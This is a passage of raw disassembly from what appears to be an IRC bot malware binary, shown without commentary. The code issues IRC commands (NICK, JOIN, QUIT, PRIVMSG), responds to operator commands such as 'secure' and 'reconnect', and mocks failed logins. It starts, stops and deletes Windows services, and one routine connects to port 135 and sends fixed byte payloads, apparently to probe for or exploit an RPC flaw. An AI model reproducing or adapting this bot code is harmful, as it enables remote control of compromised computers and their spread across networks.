add esp, 20h
jmp loc_40F547
; ---------------------------------------------------------------------------
loc_4123B7: ; CODE XREF: sub_40CD3A+12E6�j
; sub_40CD3A+12FB�j
push dword_46AE88
call sub_40A8CF
push eax
lea eax, [ebp+var_2D8]
push offset dword_433B84
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
add esp, 24h
jmp loc_40F547
; ---------------------------------------------------------------------------
loc_4123F5: ; CODE XREF: sub_40CD3A+12BC�j
; sub_40CD3A+12D1�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_412427
cmp [ebp+var_C], ebx
jz short loc_412436
push esi
push [ebp+var_C]
call sub_4158E0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_412436
push eax
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+arg_4]
call sub_412B8B
add esp, 0Ch
jmp short loc_412436
; ---------------------------------------------------------------------------
loc_412427: ; CODE XREF: sub_40CD3A+56C4�j
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+arg_4]
call sub_412B8B
pop ecx
pop ecx
loc_412436: ; CODE XREF: sub_40CD3A+56C9�j
; sub_40CD3A+56D8�j ...
push 0FFFFFFFEh
pop eax
jmp loc_40D192
; ---------------------------------------------------------------------------
loc_41243E: ; CODE XREF: sub_40CD3A+1292�j
; sub_40CD3A+12A7�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+arg_4]
call sub_412B8B
push offset dword_433B30
call sub_40B078
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_40D192
; ---------------------------------------------------------------------------
loc_412460: ; CODE XREF: sub_40CD3A+1268�j
; sub_40CD3A+127D�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_412B8B
push offset dword_433AEC
call sub_40B078
add esp, 0Ch
xor eax, eax
jmp loc_40D192
; ---------------------------------------------------------------------------
loc_412481: ; CODE XREF: sub_40CD3A+123E�j
; sub_40CD3A+1253�j
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_407075
loc_412492: ; CODE XREF: sub_40CD3A+3FBA�j
add esp, 0Ch
jmp loc_412818
; ---------------------------------------------------------------------------
loc_41249A: ; CODE XREF: sub_40CD3A+1199�j
; sub_40CD3A+11AE�j
push [ebp+esi+var_90]
push 1Eh
push offset dword_433ADC
push offset dword_433AD0
jmp short loc_4124C2
; ---------------------------------------------------------------------------
loc_4124AF: ; CODE XREF: sub_40CD3A+116F�j
; sub_40CD3A+1184�j
push [ebp+esi+var_90]
push 1Bh
push offset dword_433AC4
push offset dword_433AB4
loc_4124C2: ; CODE XREF: sub_40CD3A+FEA�j
; sub_40CD3A+1013�j ...
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_415062
add esp, 20h
jmp loc_40D18F
; ---------------------------------------------------------------------------
loc_4124DE: ; CODE XREF: sub_40CD3A+FAB�j
; sub_40CD3A+FC0�j
mov edi, [ebp+esi+var_90]
cmp edi, ebx
jz short loc_4124FD
push edi
call sub_41587F
test eax, eax
pop ecx
jz short loc_4124FD
push edi
call sub_41587F
pop ecx
jmp short loc_412502
; ---------------------------------------------------------------------------
loc_4124FD: ; CODE XREF: sub_40CD3A+57AD�j
; sub_40CD3A+57B8�j
mov eax, dword_42C240
loc_412502: ; CODE XREF: sub_40CD3A+57C1�j
mov esi, [ebp+esi+var_8C]
mov [ebp+var_38C], eax
cmp esi, ebx
jz short loc_412527
push esi
loc_412514: ; CODE XREF: sub_40CD3A+57FC�j
lea eax, [ebp+var_39C]
push 10h
push eax
call sub_41588A
add esp, 0Ch
jmp short loc_41253E
; ---------------------------------------------------------------------------
loc_412527: ; CODE XREF: sub_40CD3A+57D7�j
cmp [ebp+var_8FF], bl
jz short loc_412538
lea eax, [ebp+var_C0]
push eax
jmp short loc_412514
; ---------------------------------------------------------------------------
loc_412538: ; CODE XREF: sub_40CD3A+57F3�j
mov [ebp+var_39C], bl
loc_41253E: ; CODE XREF: sub_40CD3A+57EB�j
mov eax, [ebp+var_4]
push [ebp+var_8C]
mov esi, [ebp+arg_4]
mov [ebp+var_380], eax
mov eax, [ebp+var_8]
push 80h
mov [ebp+var_37C], eax
lea eax, [ebp+var_41C]
push eax
mov [ebp+var_420], esi
call sub_41588A
add esp, 0Ch
push [ebp+var_38C]
push esi
call sub_40A08A
pop ecx
push eax
lea eax, [ebp+var_2D8]
push offset unk_427DC8
push eax
call sub_415316
push ebx
lea eax, [ebp+var_2D8]
push 11h
push eax
call sub_414DDA
add esp, 1Ch
mov [ebp+var_388], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_420]
push ebx
push eax
push offset sub_407F42
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_388]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_4125F2
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset unk_433A68
jmp loc_412993
; ---------------------------------------------------------------------------
loc_4125EA: ; CODE XREF: sub_40CD3A+58BE�j
push 32h
call dword_421060 ; Sleep
loc_4125F2: ; CODE XREF: sub_40CD3A+589D�j
cmp [ebp+var_378], ebx
jz short loc_4125EA
jmp loc_40D18F
; ---------------------------------------------------------------------------
loc_4125FF: ; CODE XREF: sub_40CD3A+F57�j
; sub_40CD3A+F6C�j ...
push edi
push offset aSecure ; "secure"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz short loc_412627
push edi
push offset aSec ; "sec"
call sub_415730
pop ecx
mov [ebp+var_2E8], ebx
test eax, eax
pop ecx
jnz short loc_412631
loc_412627: ; CODE XREF: sub_40CD3A+58D4�j
mov [ebp+var_2E8], 1
loc_412631: ; CODE XREF: sub_40CD3A+58EB�j
push [ebp+var_8C]
lea eax, [ebp+var_36C]
push 80h
push eax
call sub_41588A
mov eax, [ebp+arg_4]
add esp, 0Ch
cmp [ebp+var_2E8], ebx
mov [ebp+var_370], eax
mov eax, [ebp+var_4]
mov [ebp+var_2E4], eax
mov eax, [ebp+var_8]
mov [ebp+var_2E0], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_412678
mov eax, offset aUnsecuring ; "Unsecuring"
loc_412678: ; CODE XREF: sub_40CD3A+5937�j
push eax
push offset dword_433A18
lea eax, [ebp+var_2D8]
push 200h
push eax
call sub_41588A
push ebx
lea eax, [ebp+var_2D8]
push 19h
push eax
call sub_414DDA
add esp, 1Ch
mov [ebp+var_2EC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_370]
push ebx
push eax
push offset sub_4144A0
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_2EC]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_4126EF
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset unk_4339C8
jmp loc_4108F0
; ---------------------------------------------------------------------------
loc_4126E7: ; CODE XREF: sub_40CD3A+59BB�j
push 32h
call dword_421060 ; Sleep
loc_4126EF: ; CODE XREF: sub_40CD3A+599A�j
cmp [ebp+var_2DC], ebx
jz short loc_4126E7
jmp loc_40D68B
; ---------------------------------------------------------------------------
loc_4126FC: ; CODE XREF: sub_40CD3A+F2D�j
; sub_40CD3A+F42�j
push offset aEnz999_9b ; "enz 999.9b"
push offset dword_4339A0
jmp loc_40F517
; ---------------------------------------------------------------------------
loc_41270B: ; CODE XREF: sub_40CD3A+F03�j
; sub_40CD3A+F18�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_412767
push esi
call sub_41587F
cmp eax, ebx
pop ecx
jl short loc_41275C
cmp eax, 2
jge short loc_41275C
mov edx, [ebp+arg_18]
mov ecx, eax
shl ecx, 7
lea esi, [ecx+edx]
cmp [esi], bl
jz short loc_412751
lea eax, [esi+1]
push eax
lea eax, [ebp+var_2D8]
push offset dword_436B80
push eax
call sub_415316
mov [esi], bl
jmp loc_40EB0A
; ---------------------------------------------------------------------------
loc_412751: ; CODE XREF: sub_40CD3A+59F9�j
push eax
push offset dword_433960
jmp loc_40EAFE
; ---------------------------------------------------------------------------
loc_41275C: ; CODE XREF: sub_40CD3A+59E5�j
; sub_40CD3A+59EA�j
push eax
push offset dword_433920
jmp loc_40EAFE
; ---------------------------------------------------------------------------
loc_412767: ; CODE XREF: sub_40CD3A+59DA�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_41276C: ; CODE XREF: sub_40CD3A+5A4E�j
push [ebp+var_94]
push edi
call sub_415730
pop ecx
test eax, eax
pop ecx
jz short loc_41278F
inc esi
add edi, 80h
cmp esi, 2
jl short loc_41276C
jmp loc_40F8F6
; ---------------------------------------------------------------------------
loc_41278F: ; CODE XREF: sub_40CD3A+5A42�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_C0]
push eax
push offset dword_436B80
jmp loc_40EAFE
; ---------------------------------------------------------------------------
loc_4127A9: ; CODE XREF: sub_40CD3A+ED9�j
; sub_40CD3A+EEE�j
push [ebp+var_90]
push offset dword_436AD8
call sub_415730
pop ecx
test eax, eax
pop ecx
jz short loc_412818
call sub_414F9D
push ebx
call dword_421114 ; ExitProcess
loc_4127CB: ; CODE XREF: sub_40CD3A+EAF�j
; sub_40CD3A+EC4�j
push [ebp+esi+var_90]
xor eax, eax
cmp [ebp+var_8F0], bl
setnz al
push eax
lea eax, [ebp+var_43C]
push dword_42C260
push eax
call sub_414278
lea eax, [ebp+var_43C]
push eax
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_412B8B
lea eax, [ebp+var_43C]
push eax
push offset dword_4338E8
call sub_40B0EC
loc_412815: ; CODE XREF: sub_40CD3A+2A1F�j
add esp, 24h
loc_412818: ; CODE XREF: sub_40CD3A+61D�j
; sub_40CD3A+629�j ...
mov eax, [ebp+arg_24]
jmp loc_40D192
; ---------------------------------------------------------------------------
loc_412820: ; CODE XREF: sub_40CD3A+ABB�j
; sub_40CD3A+AD0�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
mov [ebp+arg_0], esi
jz loc_40D18F
cmp [ebp+var_A4], ebx
jnz loc_40D18F
push offset dword_42F650
push [ebp+var_94]
call sub_416B3F
mov esi, eax
push offset dword_43B668
push ebx
inc esi
call sub_416B3F
push offset asc_4338E4 ; "~"
push eax
call sub_416B3F
push [ebp+arg_0]
mov edi, eax
push offset aHi ; "hi"
call sub_415730
add esp, 20h
test eax, eax
jz short loc_4128C8
lea eax, [ebp+var_C0]
push edi
push eax
lea eax, [ebp+var_C0]
push eax
push offset aNoticeSNiceTry ; "NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
push [ebp+arg_4]
call sub_412B8B
lea eax, [ebp+var_C0]
push eax
push offset aNoticeSYouVeBe ; "NOTICE %s :You've been logged.\r\n"
push [ebp+arg_4]
call sub_412B8B
push edi
push esi
push offset dword_433858
loc_4128B4: ; CODE XREF: sub_40CD3A+5BE7�j
lea eax, [ebp+var_2D8]
push eax
call sub_415316
add esp, 30h
jmp loc_40D68B
; ---------------------------------------------------------------------------
loc_4128C8: ; CODE XREF: sub_40CD3A+5B41�j
mov [ebp+arg_24], ebx
loc_4128CB: ; CODE XREF: sub_40CD3A+5BAE�j
mov eax, [ebp+arg_24]
push edi
push off_42C328[eax]
call sub_41512D
pop ecx
test eax, eax
pop ecx
jnz short loc_412923
add [ebp+arg_24], 4
cmp [ebp+arg_24], 4
jb short loc_4128CB
lea eax, [ebp+var_C0]
push edi
push eax
lea eax, [ebp+var_C0]
push eax
push offset aNoticeSNiceTry ; "NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
push [ebp+arg_4]
call sub_412B8B
lea eax, [ebp+var_C0]
push eax
push offset aNoticeSYouVeBe ; "NOTICE %s :You've been logged.\r\n"
push [ebp+arg_4]
call sub_412B8B
push edi
push esi
push offset dword_433818
jmp short loc_4128B4
; ---------------------------------------------------------------------------
loc_412923: ; CODE XREF: sub_40CD3A+5BA4�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_412928: ; CODE XREF: sub_40CD3A+5C0F�j
cmp [edi], bl
jnz short loc_41293F
push [ebp+arg_0]
push offset aHi ; "hi"
call sub_415730
pop ecx
test eax, eax
pop ecx
jz short loc_412950
loc_41293F: ; CODE XREF: sub_40CD3A+5BF0�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_412928
jmp loc_40D18F
; ---------------------------------------------------------------------------
loc_412950: ; CODE XREF: sub_40CD3A+5C03�j
shl esi, 7
add esi, [ebp+arg_18]
lea eax, [ebp+var_B10]
push 7Fh
push eax
push esi
call sub_416BE0
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_412987
push ebx
push [ebp+var_4]
push offset dword_4337E4
push [ebp+var_8C]
push [ebp+arg_4]
call sub_412BD1
add esp, 14h
loc_412987: ; CODE XREF: sub_40CD3A+5C31�j
lea eax, [ebp+var_C0]
push eax
push offset dword_4337B0
loc_412993: ; CODE XREF: sub_40CD3A+575�j
; sub_40CD3A+552B�j ...
call sub_40B0EC
pop ecx
loc_412999: ; CODE XREF: sub_40CD3A+28C5�j
pop ecx
jmp loc_40D18F
; ---------------------------------------------------------------------------
loc_41299F: ; CODE XREF: sub_40CD3A+200�j
; sub_40CD3A+215�j
push [ebp+arg_10]
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4]
call sub_412B8B
push offset dword_42C2FC
push [ebp+arg_10]
push offset aModeSS ; "MODE %s %s\r\n"
push [ebp+arg_4]
call sub_412B8B
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_412B8B
add esp, 2Ch
mov dword_46B000, edi
jmp loc_40CFC9
sub_40CD3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4129E5 proc near ; CODE XREF: sub_412A1D+125�p
; sub_412A1D+14C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
sub edi, [ebp+arg_C]
test edi, edi
jle short loc_412A13
loc_4129F6: ; CODE XREF: sub_4129E5+2C�j
push [ebp+arg_C]
mov eax, [ebp+arg_0]
add eax, esi
push [ebp+arg_8]
push eax
call sub_417950
add esp, 0Ch
test eax, eax
jz short loc_412A19
inc esi
cmp esi, edi
jl short loc_4129F6
loc_412A13: ; CODE XREF: sub_4129E5+F�j
xor al, al
loc_412A15: ; CODE XREF: sub_4129E5+36�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_412A19: ; CODE XREF: sub_4129E5+27�j
mov al, 1
jmp short loc_412A15
sub_4129E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412A1D proc near ; CODE XREF: sub_4033B6+88�p
; sub_4033B6+174�p
var_2010 = byte ptr -2010h
var_200E = byte ptr -200Eh
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2010h
call sub_415B90
mov eax, [ebp+arg_4]
push esi
dec eax
push edi
jz short loc_412A5E
dec eax
jz short loc_412A3C
dec eax
loc_412A36: ; CODE XREF: sub_412A1D+57�j
xor eax, eax
loc_412A38: ; CODE XREF: sub_412A1D+3F�j
; sub_412A1D+169�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_412A3C: ; CODE XREF: sub_412A1D+16�j
push 3
push 1388h
push [ebp+arg_0]
call dword_43CA64 ; inet_addr
push eax
call sub_40762E
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
jmp short loc_412A38
; ---------------------------------------------------------------------------
loc_412A5E: ; CODE XREF: sub_412A1D+13�j
push 6
push 1
push 2
call dword_43CAA4 ; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+arg_4], esi
jz short loc_412A36
push ebx
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_415390
add esp, 0Ch
mov [ebp+var_10], 2
push 87h
call dword_43CA24 ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_409F7A
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_43C9CC ; connect
cmp eax, edi
jz loc_412B7A
push ebx
push 48h
push offset dword_436BF8
push esi
call dword_43CA74 ; send
cmp eax, edi
jz loc_412B7A
mov esi, 2000h
push ebx
lea eax, [ebp+var_2010]
push esi
push eax
push [ebp+arg_4]
call dword_43CA3C ; recv
cmp eax, edi
jz loc_412B7A
cmp [ebp+var_200E], 0Ch
jnz short loc_412B7A
push ebx
push 18h
push offset dword_436C44
push [ebp+arg_4]
call dword_43CA74 ; send
cmp eax, edi
jz short loc_412B7A
push ebx
lea eax, [ebp+var_2010]
push esi
push eax
push [ebp+arg_4]
call dword_43CA3C ; recv
mov esi, eax
cmp esi, edi
jz short loc_412B7A
cmp [ebp+var_200E], 2
jnz short loc_412B7A
push 10h
push offset loc_436C60
lea eax, [ebp+var_2010]
push esi
push eax
call sub_4129E5
add esp, 10h
test al, al
jz short loc_412B5A
cmp esi, 12Ch
setnl bl
inc ebx
jmp short loc_412B7A
; ---------------------------------------------------------------------------
loc_412B5A: ; CODE XREF: sub_412A1D+12F�j
push 10h
push offset dword_436C74
lea eax, [ebp+var_2010]
push esi
push eax
call sub_4129E5
add esp, 10h
neg al
sbb eax, eax
and eax, 3
mov ebx, eax
loc_412B7A: ; CODE XREF: sub_412A1D+9B�j
; sub_412A1D+B2�j ...
push [ebp+arg_4]
call dword_43CABC ; closesocket
mov eax, ebx
pop ebx
jmp loc_412A38
sub_412A1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412B8B proc near ; CODE XREF: sub_40CBBE+3D�p
; sub_40CD3A+1BD�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push 200h
push eax
call sub_41732F
add esp, 10h
lea eax, [ebp+var_200]
push 0
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_43CA74 ; send
leave
retn
sub_412B8B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412BD1 proc near ; CODE XREF: start+88�p sub_401444+76�p ...
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice ; "NOTICE"
jnz short loc_412BEC
mov edi, offset aPrivmsg ; "PRIVMSG"
loc_412BEC: ; CODE XREF: sub_412BD1+14�j
push edi
call sub_415B10
push [ebp+arg_4]
mov esi, 1FAh
sub esi, eax
call sub_415B10
push [ebp+arg_8]
sub esi, eax
lea eax, [ebp+var_400]
push offset aS_1 ; "%s"
push esi
push eax
call sub_41588A
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push edi
push offset dword_436C88
push eax
call sub_415316
add esp, 2Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_415B10
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_43CA74 ; send
cmp [ebp+arg_10], 0
pop edi
pop esi
jz short locret_412C6A
push 7D0h
call dword_421060 ; Sleep
locret_412C6A: ; CODE XREF: sub_412BD1+8C�j
leave
retn
sub_412BD1 endp
; =============== S U B R O U T I N E =======================================
sub_412C6C proc near ; CODE XREF: sub_40CD3A:loc_40EB9B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_412CD1
lea esi, [eax+eax*2]
push 0
shl esi, 2
push 0
push dword_436CA0[esi]
push edi
push eax
call sub_412CF3
add esp, 14h
test eax, eax
jnz short loc_412CB4
push edi
push off_436C9C[esi]
mov esi, offset dword_46B6D8
push offset dword_436DD4
push esi
call sub_415316
add esp, 10h
jmp short loc_412CEE
; ---------------------------------------------------------------------------
loc_412CB4: ; CODE XREF: sub_412C6C+2A�j
push eax
call sub_412D95
push eax
push edi
mov esi, offset dword_46B6D8
push offset dword_436D98
push esi
call sub_415316
add esp, 14h
jmp short loc_412CEE
; ---------------------------------------------------------------------------
loc_412CD1: ; CODE XREF: sub_412C6C+C�j
lea eax, [eax+eax*2]
mov esi, offset dword_46B6D8
push off_436C98[eax*4]
push offset dword_436D60
push esi
call sub_415316
add esp, 0Ch
loc_412CEE: ; CODE XREF: sub_412C6C+46�j
; sub_412C6C+63�j
mov eax, esi
pop edi
pop esi
retn
sub_412C6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412CF3 proc near ; CODE XREF: sub_412C6C+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
call dword_43CA18 ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_412D1A
call dword_421088 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_412D8F
; ---------------------------------------------------------------------------
loc_412D1A: ; CODE XREF: sub_412CF3+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call dword_43C90C ; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_412D3A
call dword_421088 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_412D87
; ---------------------------------------------------------------------------
loc_412D3A: ; CODE XREF: sub_412CF3+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_412D6D
cmp eax, 3
jz short loc_412D5E
jle short loc_412D80
cmp eax, 6
jg short loc_412D80
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call dword_43C974 ; ControlService
jmp short loc_412D74
; ---------------------------------------------------------------------------
loc_412D5E: ; CODE XREF: sub_412CF3+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call dword_43C914 ; StartServiceA
jmp short loc_412D74
; ---------------------------------------------------------------------------
loc_412D6D: ; CODE XREF: sub_412CF3+4D�j
push esi
call dword_43C978 ; DeleteService
loc_412D74: ; CODE XREF: sub_412CF3+69�j
; sub_412CF3+78�j
test eax, eax
jnz short loc_412D80
call dword_421088 ; RtlGetLastWin32Error
mov ebx, eax
loc_412D80: ; CODE XREF: sub_412CF3+54�j
; sub_412CF3+59�j ...
push esi
call dword_43C928 ; CloseServiceHandle
loc_412D87: ; CODE XREF: sub_412CF3+45�j
push edi
call dword_43C928 ; CloseServiceHandle
pop esi
loc_412D8F: ; CODE XREF: sub_412CF3+25�j
mov eax, ebx
pop edi
pop ebx
leave
retn
sub_412CF3 endp
; =============== S U B R O U T I N E =======================================
sub_412D95 proc near ; CODE XREF: sub_412C6C+49�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 420h
cmp eax, ecx
ja loc_412E4A
jz loc_412E43
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_412E0D
jz short loc_412E03
mov ecx, eax
sub ecx, 3
jz short loc_412DF9
dec ecx
dec ecx
jz short loc_412DEF
dec ecx
jz short loc_412DE5
sub ecx, 51h
jz short loc_412DDB
sub ecx, 24h
jnz loc_412EC0 ; default
; jumptable 00412E67 cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_412EB2
; ---------------------------------------------------------------------------
loc_412DDB: ; CODE XREF: sub_412D95+31�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_412EB2
; ---------------------------------------------------------------------------
loc_412DE5: ; CODE XREF: sub_412D95+2C�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_412EB2
; ---------------------------------------------------------------------------
loc_412DEF: ; CODE XREF: sub_412D95+29�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_412EB2
; ---------------------------------------------------------------------------
loc_412DF9: ; CODE XREF: sub_412D95+25�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_412EB2
; ---------------------------------------------------------------------------
loc_412E03: ; CODE XREF: sub_412D95+1E�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_412EB2
; ---------------------------------------------------------------------------
loc_412E0D: ; CODE XREF: sub_412D95+1C�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_412E3C
dec ecx
jz short loc_412E35
dec ecx
jz short loc_412E2E
dec ecx
jnz loc_412EC0 ; default
; jumptable 00412E67 cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_412EB2
; ---------------------------------------------------------------------------
loc_412E2E: ; CODE XREF: sub_412D95+86�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_412EB2
; ---------------------------------------------------------------------------
loc_412E35: ; CODE XREF: sub_412D95+83�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_412EB2
; ---------------------------------------------------------------------------
loc_412E3C: ; CODE XREF: sub_412D95+80�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_412EB2
; ---------------------------------------------------------------------------
loc_412E43: ; CODE XREF: sub_412D95+11�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_412EB2
; ---------------------------------------------------------------------------
loc_412E4A: ; CODE XREF: sub_412D95+B�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_412EC0 ; default
; jumptable 00412E67 cases 1,5,6,8,9,12,13,15,16
jz short loc_412EAD
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_412EC0 ; default
; jumptable 00412E67 cases 1,5,6,8,9,12,13,15,16
movzx ecx, byte_412F01[ecx]
jmp off_412ED9[ecx*4] ; switch jump
loc_412E6E: ; DATA XREF: .text:off_412ED9�o
push offset aTheSpecifiedDa ; jumptable 00412E67 case 7
jmp short loc_412EB2
; ---------------------------------------------------------------------------
loc_412E75: ; CODE XREF: sub_412D95+D2�j
; DATA XREF: .text:off_412ED9�o
push offset aTheServiceDepe ; jumptable 00412E67 case 17
jmp short loc_412EB2
; ---------------------------------------------------------------------------
loc_412E7C: ; CODE XREF: sub_412D95+D2�j
; DATA XREF: .text:off_412ED9�o
push offset aTheServiceDe_0 ; jumptable 00412E67 case 10
jmp short loc_412EB2
; ---------------------------------------------------------------------------
loc_412E83: ; CODE XREF: sub_412D95+D2�j
; DATA XREF: .text:off_412ED9�o
push offset aTheServiceHasB ; jumptable 00412E67 case 0
jmp short loc_412EB2
; ---------------------------------------------------------------------------
loc_412E8A: ; CODE XREF: sub_412D95+D2�j
; DATA XREF: .text:off_412ED9�o
push offset aTheSpecified_0 ; jumptable 00412E67 case 2
jmp short loc_412EB2
; ---------------------------------------------------------------------------
loc_412E91: ; CODE XREF: sub_412D95+D2�j
; DATA XREF: .text:off_412ED9�o
push offset aTheServiceCoul ; jumptable 00412E67 case 11
jmp short loc_412EB2
; ---------------------------------------------------------------------------
loc_412E98: ; CODE XREF: sub_412D95+D2�j
; DATA XREF: .text:off_412ED9�o
push offset aTheServiceHa_0 ; jumptable 00412E67 case 14
jmp short loc_412EB2
; ---------------------------------------------------------------------------
loc_412E9F: ; CODE XREF: sub_412D95+D2�j
; DATA XREF: .text:off_412ED9�o
push offset aTheRequested_1 ; jumptable 00412E67 case 3
jmp short loc_412EB2
; ---------------------------------------------------------------------------
loc_412EA6: ; CODE XREF: sub_412D95+D2�j
; DATA XREF: .text:off_412ED9�o
push offset aTheServiceHasN ; jumptable 00412E67 case 4
jmp short loc_412EB2
; ---------------------------------------------------------------------------
loc_412EAD: ; CODE XREF: sub_412D95+BE�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_412EB2: ; CODE XREF: sub_412D95+41�j
; sub_412D95+4B�j ...
push offset dword_46B008
call sub_415316
pop ecx
pop ecx
jmp short loc_412ED3
; ---------------------------------------------------------------------------
loc_412EC0: ; CODE XREF: sub_412D95+36�j
; sub_412D95+89�j ...
push eax ; default
; jumptable 00412E67 cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownError ; "An unknown error occurred: <%ld>"
push offset dword_46B008
call sub_415316
add esp, 0Ch
loc_412ED3: ; CODE XREF: sub_412D95+129�j
mov eax, offset dword_46B008
retn
sub_412D95 endp
; ---------------------------------------------------------------------------
off_412ED9 dd offset loc_412E83 ; DATA XREF: sub_412D95+D2�r
dd offset loc_412E8A ; jump table for switch statement
dd offset loc_412E9F
dd offset loc_412EA6
dd offset loc_412E6E
dd offset loc_412E7C
dd offset loc_412E91
dd offset loc_412E98
dd offset loc_412E75
dd offset loc_412EC0
byte_412F01 db 0, 9, 1, 2 ; DATA XREF: sub_412D95+CB�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412F13 proc near ; CODE XREF: sub_40CD3A+1E8C�p
var_38C = byte ptr -38Ch
